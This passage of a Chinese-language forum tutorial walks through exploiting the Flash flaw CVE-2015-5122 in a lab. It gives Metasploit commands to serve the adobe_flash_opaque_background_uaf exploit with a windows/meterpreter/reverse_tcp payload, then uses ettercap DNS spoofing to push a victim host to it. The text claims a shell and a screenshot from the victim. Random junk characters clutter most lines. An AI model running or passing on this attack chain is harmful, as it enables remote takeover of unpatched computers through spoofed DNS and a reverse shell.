|
' n/ R4 A1 v& _+ L) G/ r' K* k
二、cve2015-5122漏洞实例演示虚拟机 ! A' H% a1 v: h8 D+ F- T0 O
7 J8 w8 ~2 A: F; M8 R/ ^5 R( m! m7 C/ V6 {4 R* ^& g1 Z3 Y0 T
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
! K% d7 Q/ u6 }0 T. V 3 T9 F. d' ~& \, u! P
5 i9 l: t3 U9 K9 T; E
search cve-2015-5122如图:
4 V' C7 |7 v" q
v$ ~1 V2 D* T% R& Y( |
* i! p6 D& v+ ?/ R
# g1 F: d) o7 j2 T ) Q$ y! n1 ]( I# O1 i6 e
7 o/ F4 [3 d! X. f% C1 ?+ C
下面我们敲如下命令: 6 u9 b" x; \8 Q1 }
+ T5 }; _3 g) N" ^+ W7 ^5 h0 n# I0 ` K; h! s
use exploit/multi/browser/adobe_flash_opaque_background_uaf 0 U) D7 V- k a5 I
. \2 `& N: e- l; z0 H! @ d
9 w! V8 J6 ?- z, ^, E' c$ q set PAYLOAD windows/meterpreter/reverse_tcp c* d: M ^ Q) G3 [& h/ o
5 G' }8 m! g: D2 u
3 c2 ~- @% I# [* \1 Z set LHOST 192.168.0.109
$ Z% S7 A4 ^! R6 k7 X: r, U 9 y& `- N! n C4 G* B% H
; \, A/ @; O3 r* |- z' C set URIPATH / /*根目录*/
L4 R! z. c; A! C/ w
2 \2 q5 E4 P# x: U( B4 ]1 Z' v, I" h4 `# E' Q& {
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
: |5 Q. B& J* [ , N2 ~ w$ v) l7 {5 q
. X+ z/ Q2 J0 T' ^7 o, p set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ( r4 K4 U6 O; K
" y' r$ a: ~- Y+ B; L n
* |- S5 u/ p% p& ] D# r' P% `- D! M 然后show options如图: / m7 p6 @5 w- w: e3 z' c1 L& v
0 S" \3 V- Y+ L/ v8 R$ J& z# d6 e( a' _4 [) R, k* u
: A7 ]* h% x( p% ]/ H 4 v/ \3 Y% X' T$ D
5 y9 C; g" w. K" i" ^ 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: |8 J" F' |/ Q1 h9 P. D
6 S* p% F) I! J$ E 1 P% D7 \9 j1 \( |4 a% t
4 X3 _2 Q6 E6 a, V 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
+ M0 S: |- ~, n( r
5 o( A; G! T3 p; \2 d& [. D6 E' Z; ?* Y, T
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
! x. u) T% P% J. X% q* M 2 }5 J" H' J7 k8 u8 N
4 i* {3 X( _# `3 i! W
9 e7 a/ s. R: U- u6 @ & `2 \+ x, Y& K: H# o
7 n/ ]$ S7 P/ W4 M
成功了,这时候我们断开ettercap,如图: 2 \" t! w3 m# t8 X% h5 @, u* l
/ F# P. y2 R4 A% ~9 Z' r8 o. i# z! d+ f+ T" W
( \: J, ^1 j3 F) \ ) P8 X/ W3 o7 F" i I: _* B
8 \' f2 ?, d) b8 r5 z2 x# M# Q Screenshot如图: ; [# O; n) Z$ x% J! `8 d6 S
: a/ u5 s* l) [( s3 g8 V' s3 @. B
% a( ]1 k' v7 t/ H: r; K
$ N# O4 L4 m- a& t8 A9 U' @3 u9 ?
H7 z, F% u8 {: o: V, f0 W# @8 `1 G5 M+ _" {4 r
4 j2 y# a+ [$ k/ v5 t* ^
|